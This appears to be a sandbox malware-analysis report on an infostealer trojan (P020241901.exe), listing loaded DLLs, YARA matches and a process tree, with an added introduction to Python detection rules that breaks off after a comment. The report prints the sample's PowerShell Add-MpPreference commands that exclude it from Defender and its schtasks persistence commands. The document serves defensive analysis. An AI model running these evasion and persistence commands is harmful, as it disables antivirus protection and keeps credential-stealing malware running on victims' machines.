Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: msv1_0.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: ntlmshared.dll
Source: C:\Users\user\Desktop\P020241901.exe | Section loaded: cryptdll.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: msv1_0.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: ntlmshared.dll
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Section loaded: cryptdll.dll
Source: P020241901.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 14.2.VKkzqGUhsZwwm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.P020241901.exe.3799000.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.P020241901.exe.375e5e0.11.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.P020241901.exe.375e5e0.11.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: P020241901.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: VKkzqGUhsZwwm.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, NpXw3kw.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, gyfrCFT5x9I.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, fpnV0Qjz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.P020241901.exe.3799000.10.raw.unpack, fpnV0Qjz.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | Security API names: _0020.SetAccessControl
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | Security API names: _0020.AddAccessRule
Source: 0.2.P020241901.exe.6c90000.16.raw.unpack, Mon41UfUXZQosr60DT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | Security API names: _0020.SetAccessControl
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, zcoFxPGFG5DVnMwYGR.cs | Security API names: _0020.AddAccessRule
Source: 0.2.P020241901.exe.3965270.12.raw.unpack, Mon41UfUXZQosr60DT.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@19/15@2/1
Source: C:\Users\user\Desktop\P020241901.exe | File created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6980:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
Source: C:\Users\user\Desktop\P020241901.exe | File created: C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp
Source: P020241901.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: P020241901.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\P020241901.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\P020241901.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\P020241901.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\P020241901.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: P020241901.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\P020241901.exe | File read: C:\Users\user\Desktop\P020241901.exe:Zone.Identifier
Source: unknown | Process created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exe
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\P020241901.exe | Process created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmp
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\P020241901.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpF9C9.tmpJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeProcess created: C:\Users\user\Desktop\P020241901.exe C:\Users\user\Desktop\P020241901.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VKkzqGUhsZwwm" /XML "C:\Users\user\AppData\Local\Temp\tmpBEA.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeProcess created: C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exe C:\Users\user\AppData\Roaming\VKkzqGUhsZwwm.exeJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\P020241901.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\P020241901.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: P020241901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: P020241901.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: P020241901.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: kugJ.pdbSHA256 source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr
                      Source: Binary string: kugJ.pdb source: P020241901.exe, VKkzqGUhsZwwm.exe.0.dr
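The process tree above (the dropper spawning powershell.exe with Add-MpPreference -ExclusionPath, and schtasks.exe importing a task XML from AppData\Local\Temp) is the part of this report that turns directly into detection logic; the same schtasks line is what the Boot Survival section below lists. The Python that follows is an added example, not part of the Joe Sandbox report: it runs two rules over constructed Sysmon-style process-creation records modelled on the command lines above. The PIDs, the record field names, the rule names and the Base64-encoded variant of the cmdlet are assumptions of the example, not observations from the sample. It goes beyond the listing in one respect: it decodes -EncodedCommand payloads before matching, so a Base64-wrapped Add-MpPreference is caught by the same rule as the plain one.

```python
"""Detections for the evasion and persistence chain in the report: PowerShell
adding Defender exclusions (plain or Base64-encoded) and schtasks importing a
task XML from a temp directory. Added example, not Joe Sandbox code; the
events below are constructed Sysmon-style records modelled on the report."""
import base64
import binascii
import re

# Constructed fixtures: paths come from the report, PIDs and the encoded
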